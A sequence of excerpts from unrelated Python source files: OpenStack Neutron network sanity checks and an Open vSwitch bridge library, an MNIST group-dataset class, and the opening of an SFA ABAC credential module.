4. Spawn keepalived process inside the namespace with IPv6 configuration.
5. Verify if IPv6 address is assigned to gw_port.
6. Verify if IPv6 default route is configured by keepalived.
"""
br_name, ha_port, gw_port = common_utils.get_related_rand_device_names(
['ka-test-', ha_router.HA_DEV_PREFIX, namespaces.INTERNAL_DEV_PREFIX])
gw_vip = 'fdf8:f53b:82e4::10/64'
expected_default_gw = 'fe80:f816::1'
with ovs_lib.OVSBridge(br_name) as br:
with KeepalivedIPv6Test(ha_port, gw_port, gw_vip,
expected_default_gw) as ka:
br.add_port(ha_port, ('type', 'internal'))
br.add_port(gw_port, ('type', 'internal'))
ha_dev = ip_lib.IPDevice(ha_port)
gw_dev = ip_lib.IPDevice(gw_port)
ha_dev.link.set_netns(ka.nsname)
gw_dev.link.set_netns(ka.nsname)
ha_dev.link.set_up()
gw_dev.link.set_up()
ha_dev.addr.add('169.254.192.8/18')
ka.configure()
ka.start_keepalived_process()
ka.verify_ipv6_address_assignment(gw_dev)
default_gw = gw_dev.route.get_gateway(ip_version=6)
if default_gw:
default_gw = default_gw['via']
return expected_default_gw == default_gw
def ovsdb_native_supported():
# Running the test should ensure we are configured for OVSDB native
try:
ovs = ovs_lib.BaseOVS()
ovs.get_bridges()
return True
except ImportError as ex:
LOG.error("Failed to import required modules. Ensure that the "
"python-openvswitch package is installed. Error: %s",
ex)
except Exception:
LOG.exception("Unexpected exception occurred.")
return False
def ovs_conntrack_supported():
br_name = common_utils.get_rand_device_name(prefix="ovs-test-")
with ovs_lib.OVSBridge(br_name) as br:
try:
br.add_protocols(*["OpenFlow%d" % i for i in range(10, 15)])
except RuntimeError as e:
LOG.debug("Exception while checking ovs conntrack support: %s", e)
return False
return ofctl_arg_supported(cmd='add-flow', ct_state='+trk', actions='drop')
def ebtables_supported():
try:
cmd = ['ebtables', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed ebtables. "
"Exception: %s", e)
return False
def ipset_supported():
try:
cmd = ['ipset', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed ipset. "
"Exception: %s", e)
return False
def ip6tables_supported():
try:
cmd = ['ip6tables', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed ip6tables. "
"Exception: %s", e)
return False
def conntrack_supported():
try:
cmd = ['conntrack', '--version']
agent_utils.execute(cmd)
return True
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking for installed conntrack. "
"Exception: %s", e)
return False
def get_minimal_dibbler_version_supported():
return MINIMUM_DIBBLER_VERSION
def dibbler_version_supported():
try:
cmd = ['dibbler-client',
'help']
out = agent_utils.execute(cmd)
return '-w' in out
except (OSError, RuntimeError, IndexError, ValueError) as e:
LOG.debug("Exception while checking minimal dibbler version. "
"Exception: %s", e)
return False
def _fix_ip_nonlocal_bind_root_value(original_value):
current_value = ip_lib.get_ip_nonlocal_bind(namespace=None)
if current_value != original_value:
ip_lib.set_ip_nonlocal_bind(value=original_value, namespace=None)
def ip_nonlocal_bind():
nsname1 = "ipnonlocalbind1-" + uuidutils.generate_uuid()
nsname2 = "ipnonlocalbind2-" + uuidutils.generate_uuid()
ip_lib.create_network_namespace(nsname1)
try:
ip_lib.create_network_namespace(nsname2)
try:
original_value = ip_lib.get_ip_nonlocal_bind(namespace=None)
try:
ip_lib.set_ip_nonlocal_bind(value=0, namespace=nsname1)
ip_lib.set_ip_nonlocal_bind(value=1, namespace=nsname2)
ns1_value = ip_lib.get_ip_nonlocal_bind(namespace=nsname1)
finally:
_fix_ip_nonlocal_bind_root_value(original_value)
except RuntimeError as e:
LOG.debug("Exception while checking ip_nonlocal_bind. "
"Exception: %s", e)
return False
finally:
ip_lib.delete_network_namespace(nsname2)
finally:
ip_lib.delete_network_namespace(nsname1)
return ns1_value == 0
def gre_conntrack_supported():
cmd = ['modinfo', CONNTRACK_GRE_MODULE]
try:
return agent_utils.execute(cmd, log_fail_as_error=False)
except exceptions.ProcessExecutionError:
return False
def min_tx_rate_support():
device_mappings = helpers.parse_mappings(
cfg.CONF.SRIOV_NIC.physical_device_mappings, unique_keys=False)
devices_to_test = set()
for devices_in_physnet in device_mappings.values():
for device in devices_in_physnet:
devices_to_test.add(device)
# NOTE(ralonsoh): the VF used by default is 0. Each SR-IOV configured
# NIC should have configured at least 1 VF.
VF_NUM = 0
devices_without_support = set()
for device in devices_to_test:
try:
ip_link = ip_lib.IpLinkCommand(device)
# NOTE(ralonsoh): to set min_tx_rate, first is needed to set
# max_tx_rate and max_tx_rate >= min_tx_rate.
vf_config = {'vf': VF_NUM, 'rate': {'min_tx_rate': int(400),
'max_tx_rate': int(500)}}
ip_link.set_vf_feature(vf_config)
vf_config = {'vf': VF_NUM, 'rate': {'min_tx_rate': 0,
'max_tx_rate': 0}}
ip_link.set_vf_feature(vf_config)
except ip_lib.InvalidArgument:
devices_without_support.add(device)
if devices_without_support:
LOG.debug('The following NICs do not support "min_tx_rate": %s',
devices_without_support)
return False
return True
def ovn_nb_db_schema_port_group_supported():
try:
ver = _get_ovn_version(OVNCheckType.nb_db_schema)
minver = versionutils.convert_version_to_tuple(
OVN_NB_DB_SCHEMA_PORT_GROUP)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug('Exception while checking OVN DB schema version. '
'Exception: %s', e)
return False
return True
def ovn_nb_db_schema_stateless_nat_supported():
try:
ver = _get_ovn_version(OVNCheckType.nb_db_schema)
minver = versionutils.convert_version_to_tuple(
OVN_NB_DB_SCHEMA_STATELESS_NAT)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug('Exception while checking OVN DB schema version. '
'Exception: %s', e)
return False
return True
def ovn_sb_db_schema_virtual_port_supported():
try:
ver = _get_ovn_version(OVNCheckType.sb_db_schema)
minver = versionutils.convert_version_to_tuple(
OVN_SB_DB_SCHEMA_VIRTUAL_PORT)
if ver < minver:
return False
except (OSError, RuntimeError, ValueError) as e:
LOG.debug('Exception while checking OVN DB schema version. '
'Exception: %s', e)
return False
return True
|
|
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import operator
from oslo.config import cfg
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils
from neutron.common import exceptions
from neutron.openstack.common import excutils
from neutron.openstack.common.gettextutils import _LI, _LW
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
# Default timeout for ovs-vsctl command
DEFAULT_OVS_VSCTL_TIMEOUT = 10
# Special return value for an invalid OVS ofport
INVALID_OFPORT = '-1'
OPTS = [
cfg.IntOpt('ovs_vsctl_timeout',
default=DEFAULT_OVS_VSCTL_TIMEOUT,
help=_('Timeout in seconds for ovs-vsctl commands')),
]
cfg.CONF.register_opts(OPTS)
LOG = logging.getLogger(__name__)
class VifPort:
def __init__(self, port_name, ofport, vif_id, vif_mac, switch):
self.port_name = port_name
self.ofport = ofport
self.vif_id = vif_id
self.vif_mac = vif_mac
self.switch = switch
def __str__(self):
return ("iface-id=" + self.vif_id + ", vif_mac=" +
self.vif_mac + ", port_name=" + self.port_name +
", ofport=" + str(self.ofport) + ", bridge_name=" +
self.switch.br_name)
class BaseOVS(object):
def __init__(self, root_helper):
self.root_helper = root_helper
self.vsctl_timeout = cfg.CONF.ovs_vsctl_timeout
def run_vsctl(self, args, check_error=False):
full_args = ["ovs-vsctl", "--timeout=%d" % self.vsctl_timeout] + args
try:
return utils.execute(full_args, root_helper=self.root_helper)
except Exception as e:
with excutils.save_and_reraise_exception() as ctxt:
LOG.error(_("Unable to execute %(cmd)s. "
"Exception: %(exception)s"),
{'cmd': full_args, 'exception': e})
if not check_error:
ctxt.reraise = False
def add_bridge(self, bridge_name):
self.run_vsctl(["--", "--may-exist", "add-br", bridge_name])
return OVSBridge(bridge_name, self.root_helper)
def delete_bridge(self, bridge_name):
self.run_vsctl(["--", "--if-exists", "del-br", bridge_name])
def bridge_exists(self, bridge_name):
try:
self.run_vsctl(['br-exists', bridge_name], check_error=True)
except RuntimeError as e:
with excutils.save_and_reraise_exception() as ctxt:
if 'Exit code: 2\n' in str(e):
ctxt.reraise = False
return False
return True
def get_bridge_name_for_port_name(self, port_name):
try:
return self.run_vsctl(['port-to-br', port_name], check_error=True)
except RuntimeError as e:
with excutils.save_and_reraise_exception() as ctxt:
if 'Exit code: 1\n' in str(e):
ctxt.reraise = False
def port_exists(self, port_name):
return bool(self.get_bridge_name_for_port_name(port_name))
class OVSBridge(BaseOVS):
def __init__(self, br_name, root_helper):
super(OVSBridge, self).__init__(root_helper)
self.br_name = br_name
def set_controller(self, controller_names):
vsctl_command = ['--', 'set-controller', self.br_name]
vsctl_command.extend(controller_names)
self.run_vsctl(vsctl_command, check_error=True)
def del_controller(self):
self.run_vsctl(['--', 'del-controller', self.br_name],
check_error=True)
def get_controller(self):
res = self.run_vsctl(['--', 'get-controller', self.br_name],
check_error=True)
if res:
return res.strip().split('\n')
return res
def set_secure_mode(self):
self.run_vsctl(['--', 'set-fail-mode', self.br_name, 'secure'],
check_error=True)
def set_protocols(self, protocols):
self.run_vsctl(['--', 'set', 'bridge', self.br_name,
"protocols=%s" % protocols],
check_error=True)
def create(self):
self.add_bridge(self.br_name)
def destroy(self):
self.delete_bridge(self.br_name)
def reset_bridge(self):
self.destroy()
self.create()
def add_port(self, port_name):
self.run_vsctl(["--", "--may-exist", "add-port", self.br_name,
port_name])
return self.get_port_ofport(port_name)
def delete_port(self, port_name):
self.run_vsctl(["--", "--if-exists", "del-port", self.br_name,
port_name])
def set_db_attribute(self, table_name, record, column, value):
args = ["set", table_name, record, "%s=%s" % (column, value)]
self.run_vsctl(args)
def clear_db_attribute(self, table_name, record, column):
args = ["clear", table_name, record, column]
self.run_vsctl(args)
def run_ofctl(self, cmd, args, process_input=None):
full_args = ["ovs-ofctl", cmd, self.br_name] + args
try:
return utils.execute(full_args, root_helper=self.root_helper,
process_input=process_input)
except Exception as e:
LOG.error(_("Unable to execute %(cmd)s. Exception: %(exception)s"),
{'cmd': full_args, 'exception': e})
def count_flows(self):
flow_list = self.run_ofctl("dump-flows", []).split("\n")[1:]
return len(flow_list) - 1
def remove_all_flows(self):
self.run_ofctl("del-flows", [])
def get_port_ofport(self, port_name):
ofport = self.db_get_val("Interface", port_name, "ofport")
# This can return a non-integer string, like '[]' so ensure a
# common failure case
try:
int(ofport)
return ofport
except (ValueError, TypeError):
return INVALID_OFPORT
def get_datapath_id(self):
return self.db_get_val('Bridge',
self.br_name, 'datapath_id').strip('"')
def do_action_flows(self, action, kwargs_list):
flow_strs = [_build_flow_expr_str(kw, action) for kw in kwargs_list]
self.run_ofctl('%s-flows' % action, ['-'], '\n'.join(flow_strs))
def add_flow(self, **kwargs):
self.do_action_flows('add', [kwargs])
def mod_flow(self, **kwargs):
self.do_action_flows('mod', [kwargs])
def delete_flows(self, **kwargs):
self.do_action_flows('del', [kwargs])
def dump_flows_for_table(self, table):
retval = None
flow_str = "table=%s" % table
flows = self.run_ofctl("dump-flows", [flow_str])
if flows:
retval = '\n'.join(item for item in flows.splitlines()
if 'NXST' not in item)
return retval
def deferred(self, **kwargs):
return DeferredOVSBridge(self, **kwargs)
def add_tunnel_port(self, port_name, remote_ip, local_ip,
tunnel_type=constants.TYPE_GRE,
vxlan_udp_port=constants.VXLAN_UDP_PORT,
dont_fragment=True):
vsctl_command = ["--", "--may-exist", "add-port", self.br_name,
port_name]
vsctl_command.extend(["--", "set", "Interface", port_name,
"type=%s" % tunnel_type])
if tunnel_type == constants.TYPE_VXLAN:
# Only set the VXLAN UDP port if it's not the default
if vxlan_udp_port != constants.VXLAN_UDP_PORT:
vsctl_command.append("options:dst_port=%s" % vxlan_udp_port)
vsctl_command.append(("options:df_default=%s" %
bool(dont_fragment)).lower())
vsctl_command.extend(["options:remote_ip=%s" % remote_ip,
"options:local_ip=%s" % local_ip,
"options:in_key=flow",
"options:out_key=flow"])
self.run_vsctl(vsctl_command)
ofport = self.get_port_ofport(port_name)
if (tunnel_type == constants.TYPE_VXLAN and
ofport == INVALID_OFPORT):
LOG.error(_('Unable to create VXLAN tunnel port. Please ensure '
'that an openvswitch version that supports VXLAN is '
'installed.'))
return ofport
def add_patch_port(self, local_name, remote_name):
self.run_vsctl(["add-port", self.br_name, local_name,
"--", "set", "Interface", local_name,
"type=patch", "options:peer=%s" % remote_name])
return self.get_port_ofport(local_name)
def db_get_map(self, table, record, column, check_error=False):
output = self.run_vsctl(["get", table, record, column], check_error)
if output:
output_str = output.rstrip("\n\r")
return self.db_str_to_map(output_str)
return {}
def db_get_val(self, table, record, column, check_error=False):
output = self.run_vsctl(["get", table, record, column], check_error)
if output:
return output.rstrip("\n\r")
def db_str_to_map(self, full_str):
list = full_str.strip("{}").split(", ")
ret = {}
for e in list:
if e.find("=") == -1:
continue
arr = e.split("=")
ret[arr[0]] = arr[1].strip("\"")
return ret
def get_port_name_list(self):
res = self.run_vsctl(["list-ports", self.br_name], check_error=True)
if res:
return res.strip().split("\n")
return []
def get_port_stats(self, port_name):
return self.db_get_map("Interface", port_name, "statistics")
def get_xapi_iface_id(self, xs_vif_uuid):
args = ["xe", "vif-param-get", "param-name=other-config",
"param-key=nicira-iface-id", "uuid=%s" % xs_vif_uuid]
try:
return utils.execute(args, root_helper=self.root_helper).strip()
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Unable to execute %(cmd)s. "
"Exception: %(exception)s"),
{'cmd': args, 'exception': e})
# returns a VIF object for each VIF port
def get_vif_ports(self):
edge_ports = []
port_names = self.get_port_name_list()
for name in port_names:
external_ids = self.db_get_map("Interface", name, "external_ids",
check_error=True)
ofport = self.db_get_val("Interface", name, "ofport",
check_error=True)
if "iface-id" in external_ids and "attached-mac" in external_ids:
p = VifPort(name, ofport, external_ids["iface-id"],
external_ids["attached-mac"], self)
edge_ports.append(p)
elif ("xs-vif-uuid" in external_ids and
"attached-mac" in external_ids):
# if this is a xenserver and iface-id is not automatically
# synced to OVS from XAPI, we grab it from XAPI directly
iface_id = self.get_xapi_iface_id(external_ids["xs-vif-uuid"])
p = VifPort(name, ofport, iface_id,
external_ids["attached-mac"], self)
edge_ports.append(p)
return edge_ports
def get_vif_port_set(self):
port_names = self.get_port_name_list()
edge_ports = set()
args = ['--format=json', '--', '--columns=name,external_ids,ofport',
'list', 'Interface']
result = self.run_vsctl(args, check_error=True)
if not result:
return edge_ports
for row in jsonutils.loads(result)['data']:
name = row[0]
if name not in port_names:
continue
external_ids = dict(row[1][1])
# Do not consider VIFs which aren't yet ready
# This can happen when ofport values are either [] or ["set", []]
# We will therefore consider only integer values for ofport
ofport = row[2]
try:
int_ofport = int(ofport)
except (ValueError, TypeError):
LOG.warn(_("Found not yet ready openvswitch port: %s"), row)
else:
if int_ofport > 0:
if ("iface-id" in external_ids and
"attached-mac" in external_ids):
edge_ports.add(external_ids['iface-id'])
elif ("xs-vif-uuid" in external_ids and
"attached-mac" in external_ids):
# if this is a xenserver and iface-id is not
# automatically synced to OVS from XAPI, we grab it
# from XAPI directly
iface_id = self.get_xapi_iface_id(
external_ids["xs-vif-uuid"])
edge_ports.add(iface_id)
else:
LOG.warn(_("Found failed openvswitch port: %s"), row)
return edge_ports
def get_port_tag_dict(self):
"""Get a dict of port names and associated vlan tags.
e.g. the returned dict is of the following form::
{u'int-br-eth2': [],
u'patch-tun': [],
u'qr-76d9e6b6-21': 1,
u'tapce5318ff-78': 1,
u'tape1400310-e6': 1}
The TAG ID is only available in the "Port" table and is not available
in the "Interface" table queried by the get_vif_port_set() method.
"""
port_names = self.get_port_name_list()
args = ['--format=json', '--', '--columns=name,tag', 'list', 'Port']
result = self.run_vsctl(args, check_error=True)
port_tag_dict = {}
if not result:
return port_tag_dict
for name, tag in jsonutils.loads(result)['data']:
if name not in port_names:
continue
# 'tag' can be [u'set', []] or an integer
if isinstance(tag, list):
tag = tag[1]
port_tag_dict[name] = tag
return port_tag_dict
def get_vif_port_by_id(self, port_id):
args = ['--format=json', '--', '--columns=external_ids,name,ofport',
'find', 'Interface',
'external_ids:iface-id="%s"' % port_id]
result = self.run_vsctl(args)
if not result:
return
json_result = jsonutils.loads(result)
try:
# Retrieve the indexes of the columns we're looking for
headings = json_result['headings']
ext_ids_idx = headings.index('external_ids')
name_idx = headings.index('name')
ofport_idx = headings.index('ofport')
# If data attribute is missing or empty the line below will raise
# an exeception which will be captured in this block.
# We won't deal with the possibility of ovs-vsctl return multiple
# rows since the interface identifier is unique
for data in json_result['data']:
port_name = data[name_idx]
switch = get_bridge_for_iface(self.root_helper, port_name)
if switch != self.br_name:
continue
ofport = data[ofport_idx]
# ofport must be integer otherwise return None
if not isinstance(ofport, int) or ofport == -1:
LOG.warn(_LW("ofport: %(ofport)s for VIF: %(vif)s is not a"
" positive integer"), {'ofport': ofport,
'vif': port_id})
return
# Find VIF's mac address in external ids
ext_id_dict = dict((item[0], item[1]) for item in
data[ext_ids_idx][1])
vif_mac = ext_id_dict['attached-mac']
return VifPort(port_name, ofport, port_id, vif_mac, self)
LOG.info(_LI("Port %(port_id)s not present in bridge %(br_name)s"),
{'port_id': port_id, 'br_name': self.br_name})
except Exception as error:
LOG.warn(_LW("Unable to parse interface details. Exception: %s"),
error)
return
def delete_ports(self, all_ports=False):
if all_ports:
port_names = self.get_port_name_list()
else:
port_names = (port.port_name for port in self.get_vif_ports())
for port_name in port_names:
self.delete_port(port_name)
def get_local_port_mac(self):
"""Retrieve the mac of the bridge's local port."""
address = ip_lib.IPDevice(self.br_name, self.root_helper).link.address
if address:
return address
else:
msg = _('Unable to determine mac address for %s') % self.br_name
raise Exception(msg)
def __enter__(self):
self.create()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.destroy()
class DeferredOVSBridge(object):
'''Deferred OVSBridge.
This class wraps add_flow, mod_flow and delete_flows calls to an OVSBridge
and defers their application until apply_flows call in order to perform
bulk calls. It wraps also ALLOWED_PASSTHROUGHS calls to avoid mixing
OVSBridge and DeferredOVSBridge uses.
This class can be used as a context, in such case apply_flows is called on
__exit__ except if an exception is raised.
This class is not thread-safe, that's why for every use a new instance
must be implemented.
'''
ALLOWED_PASSTHROUGHS = 'add_port', 'add_tunnel_port', 'delete_port'
def __init__(self, br, full_ordered=False,
order=('add', 'mod', 'del')):
'''Constructor.
:param br: wrapped bridge
:param full_ordered: Optional, disable flow reordering (slower)
:param order: Optional, define in which order flow are applied
'''
self.br = br
self.full_ordered = full_ordered
self.order = order
if not self.full_ordered:
self.weights = dict((y, x) for x, y in enumerate(self.order))
self.action_flow_tuples = []
def __getattr__(self, name):
if name in self.ALLOWED_PASSTHROUGHS:
return getattr(self.br, name)
raise AttributeError(name)
def add_flow(self, **kwargs):
self.action_flow_tuples.append(('add', kwargs))
def mod_flow(self, **kwargs):
self.action_flow_tuples.append(('mod', kwargs))
def delete_flows(self, **kwargs):
self.action_flow_tuples.append(('del', kwargs))
def apply_flows(self):
action_flow_tuples = self.action_flow_tuples
self.action_flow_tuples = []
if not action_flow_tuples:
return
if not self.full_ordered:
action_flow_tuples.sort(key=lambda af: self.weights[af[0]])
grouped = itertools.groupby(action_flow_tuples,
key=operator.itemgetter(0))
itemgetter_1 = operator.itemgetter(1)
for action, action_flow_list in grouped:
flows = map(itemgetter_1, action_flow_list)
self.br.do_action_flows(action, flows)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is None:
self.apply_flows()
else:
LOG.exception(_("OVS flows could not be applied on bridge %s"),
self.br.br_name)
def get_bridge_for_iface(root_helper, iface):
args = ["ovs-vsctl", "--timeout=%d" % cfg.CONF.ovs_vsctl_timeout,
"iface-to-br", iface]
try:
return utils.execute(args, root_helper=root_helper).strip()
except Exception:
LOG.exception(_("Interface %s not found."), iface)
return None
def get_bridges(root_helper):
args = ["ovs-vsctl", "--timeout=%d" % cfg.CONF.ovs_vsctl_timeout,
"list-br"]
try:
return utils.execute(args, root_helper=root_helper).strip().split("\n")
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.exception(_("Unable to retrieve bridges. Exception: %s"), e)
def get_bridge_external_bridge_id(root_helper, bridge):
args = ["ovs-vsctl", "--timeout=2", "br-get-external-id",
bridge, "bridge-id"]
try:
return utils.execute(args, root_helper=root_helper).strip()
except Exception:
LOG.exception(_("Bridge %s not found."), bridge)
return None
def _build_flow_expr_str(flow_dict, cmd):
flow_expr_arr = []
actions = None
if cmd == 'add':
flow_expr_arr.append("hard_timeout=%s" %
flow_dict.pop('hard_timeout', '0'))
flow_expr_arr.append("idle_timeout=%s" %
flow_dict.pop('idle_timeout', '0'))
flow_expr_arr.append("priority=%s" %
flow_dict.pop('priority', '1'))
elif 'priority' in flow_dict:
msg = _("Cannot match priority on flow deletion or modification")
raise exceptions.InvalidInput(error_message=msg)
if cmd != 'del':
if "actions" not in flow_dict:
msg = _("Must specify one or more actions on flow addition"
" or modification")
raise exceptions.InvalidInput(error_message=msg)
actions = "actions=%s" % flow_dict.pop('actions')
for key, value in flow_dict.iteritems():
if key == 'proto':
flow_expr_arr.append(value)
else:
flow_expr_arr.append("%s=%s" % (key, str(value)))
if actions:
flow_expr_arr.append(actions)
return ','.join(flow_expr_arr)
|
|
"""This module provides provides a dataset for the extension of RAM."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .DummyDataset import DummyDataset
from .IndexGenerator import IndexGenerator
import itertools
import numpy as np
class GroupDataset(object):
"""The Dataset class where each sample holds MNIST samples in a group."""
def __init__(
self, index_generator, dataset, noise_label_index,
data_label_index, amount_of_classes,
noises_per_class, n_samples, sample_size, one_hot=False
):
"""Construct a new Index Generator.
Args:
index_generator(IndexGenerator): index generator
dataset(object): accept the dataset (MNIST)
pythonic way: dataset should have properties:
`images` and `labels`
noise_label_index(list): noise label is expected at this index.
All other indexes will be considered as places where actual
information comes from.One either specifies `noise_label_index`
or `data_label_index`. These properties are mutually exclusive.
data_label_index(list): data label is expected at this index.
Indexes of labels where relevant for the task
information comes from.
amount_of_classes(int): amount of classes the dataset should have
noises_per_class(list): amount of noise labels per sample that
each of the class should have. Should be an array of size
`amount_of_classes`. This equation should be fulfilled:
all(
amount_of_classes > noise_n for noise_n in noises_per_class
)
n_samples(int): amount of sample in each of the class.
Should be an array of size `amount_of_classes` or integer
if the amount is the same acroll all classes.
sample_size(int): amount of pictures in one
sample(i.e. size of group).
one_hot(Boolean): if True then labels will be one hot encoded,
otherwise not.
"""
if(not(hasattr(dataset, "labels") and hasattr(dataset, "images"))):
raise ValueError(
'dataset object should have properties: `images` and `labels`'
)
if(not isinstance(index_generator, IndexGenerator)):
raise ValueError(
'index_generator should be an instance of IndexGenerator class'
)
if(
len(set(noise_label_index)) != len(noise_label_index) or
max(noise_label_index) >= amount_of_classes
):
raise ValueError(
'noise_label_index should not have duplicates. \
Noise indexes is out of range'
)
if(max(noises_per_class) > sample_size):
raise ValueError(
'noises_per_class should be less than amount of \
classes(amount_of_classes)'
)
if(
isinstance(n_samples, int) or
len(n_samples) != amount_of_classes
):
raise ValueError(
'n_samples should either be an int or fullfil \
len(n_samples) == amount_of_classes'
)
if(isinstance(n_samples, int)):
self.n_samples_per_class = (
[n_samples] * amount_of_classes
)
else:
self.n_samples_per_class = n_samples
self.__dataset = dataset
self.index_generator = index_generator
self.one_hot = one_hot
self.noise_label_index = noise_label_index
self.data_label_index = data_label_index
self.amount_of_classes = amount_of_classes
self.noises_per_class = noises_per_class
self.sample_size = sample_size
self._divide_dataset()
self._build_groups()
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def epochs_completed(self):
"""Return amount of epoch completed of the dataset."""
return self._epochs_completed
@property
def images(self):
"""Return the images of the dataset."""
return self._images
@property
def labels(self):
"""Return the labels of the dataset."""
return self._labels
def _divide_dataset(self):
# we need to extract two dataset from one which comes from
# constructor. These properites should be something like
# noise_data ; .labels, .images
# information_dataset ; .labels, .images
self.__noise_data = DummyDataset()
self.__information_data = DummyDataset()
for image, label in zip(self.__dataset.images, self.__dataset.labels):
if(np.argmax(label) in self.noise_label_index):
self.__noise_data.add_sample(image, label)
if(np.argmax(label) in self.data_label_index):
self.__information_data.add_sample(image, label)
def _build_groups(self):
self._images = []
self._labels = []
for i in range(self.amount_of_classes):
self._build_group_for_class(i)
self._images = np.array(self._images)
self._labels = np.array(self._labels)
self.num_examples = self._labels.shape[0]
self.permute()
def _build_group_for_class(self, class_number):
n_samples = self.n_samples_per_class[class_number]
class_label = self._build_label_for_class(class_number)
noise_comb, data_comb = self._build_combinations(class_number)
for i in range(n_samples):
group = []
try:
combination_noise_i = next(noise_comb)
combinations_data_i = next(data_comb)
except StopIteration:
noise_comb, data_comb = self._build_combinations_and_permute(
class_number
)
combination_noise_i = next(noise_comb)
combinations_data_i = next(data_comb)
noise_images, noise_labels = self.__noise_data.get(
combination_noise_i
)
info_images, info_labels = self.__information_data.get(
combinations_data_i
)
noise_indexes = self.index_generator.get_indexes_for_class(
class_number
)[0]
for j in range(self.sample_size):
if(j in noise_indexes):
group.append(noise_images.pop())
if(j not in noise_indexes):
group.append(info_images.pop())
self._images.append(group)
self._labels.append(class_label)
def _permute_datasets(self):
self.__noise_data.permute()
self.__information_data.permute()
def _build_label_for_class(self, cls_n):
if(self.one_hot):
class_label = np.zeros((1, self.amount_of_classes))
class_label[np.arange(1), [cls_n]] = 1
else:
class_label = cls_n
return class_label
def _build_combinations(self, cls_n):
n_noise_per_class = self.noises_per_class[cls_n]
n_data_per_class = self.sample_size - n_noise_per_class
noise_combinations_indicices = itertools.combinations(
range(self.__noise_data.length), n_noise_per_class
)
data_combinations_indicices = itertools.combinations(
range(self.__information_data.length), n_data_per_class
)
return noise_combinations_indicices, data_combinations_indicices
def _build_combinations_and_permute(self, cls_n):
self._permute_datasets()
return self._build_combinations(cls_n)
def next_batch(self, batch_size):
"""Get next batch of size `batch_size`."""
start = self._index_in_epoch
if start + batch_size > self.num_examples:
self._epochs_completed += 1
rest_num_examples = self.num_examples - start
images_rest_part = self._images[start:self.num_examples]
labels_rest_part = self._labels[start:self.num_examples]
self.permute()
start = 0
self._index_in_epoch = batch_size - rest_num_examples
end = self._index_in_epoch
images_new_part = self._images[start:end]
labels_new_part = self._labels[start:end]
result_images = np.concatenate(
(images_rest_part, images_new_part), axis=0
)
result_labels = np.concatenate(
(labels_rest_part, labels_new_part), axis=0
)
return result_images, result_labels
else:
self._index_in_epoch += batch_size
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
def permute(self):
"""Permute the dataset."""
perm0 = np.arange(self.num_examples)
np.random.shuffle(perm0)
self._images = self._images[perm0]
self._labels = self._labels[perm0]
return self
|
|
#----------------------------------------------------------------------
# Copyright (c) 2014 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
from sfa.trust.credential import Credential, append_sub, DEFAULT_CREDENTIAL_LIFETIME
from sfa.util.sfalogging import logger
from sfa.util.sfatime import SFATIME_FORMAT
from StringIO import StringIO
from xml.dom.minidom import Document, parseString
HAVELXML = False
try:
from lxml import etree
HAVELXML = True
except:
pass
# This module defines a subtype of sfa.trust,credential.Credential
# called an ABACCredential. An ABAC credential is a signed statement
# asserting a role representing the relationship between a subject and target
# or between a subject and a class of targets (all those satisfying a role).
#
# An ABAC credential is like a normal SFA credential in that it has
# a validated signature block and is checked for expiration.
# It does not, however, have 'privileges'. Rather it contains a 'head' and
# list of 'tails' of elements, each of which represents a principal and
# role.
# A special case of an ABAC credential is a speaks_for credential. Such
# a credential is simply an ABAC credential in form, but has a single
# tail and fixed role 'speaks_for'. In ABAC notation, it asserts
# AGENT.speaks_for(AGENT)<-CLIENT, or "AGENT asserts that CLIENT may speak
# for AGENT". The AGENT in this case is the head and the CLIENT is the
# tail and 'speaks_for_AGENT' is the role on the head. These speaks-for
# Credentials are used to allow a tool to 'speak as' itself but be recognized
# as speaking for an individual and be authorized to the rights of that
# individual and not to the rights of the tool itself.
# For more detail on the semantics and syntax and expected usage patterns
# of ABAC credentials, see http://groups.geni.net/geni/wiki/TIEDABACCredential.
# An ABAC element contains a principal (keyid and optional mnemonic)
# and optional role and linking_role element
class ABACElement:
def __init__(self, principal_keyid, principal_mnemonic=None, \
role=None, linking_role=None):
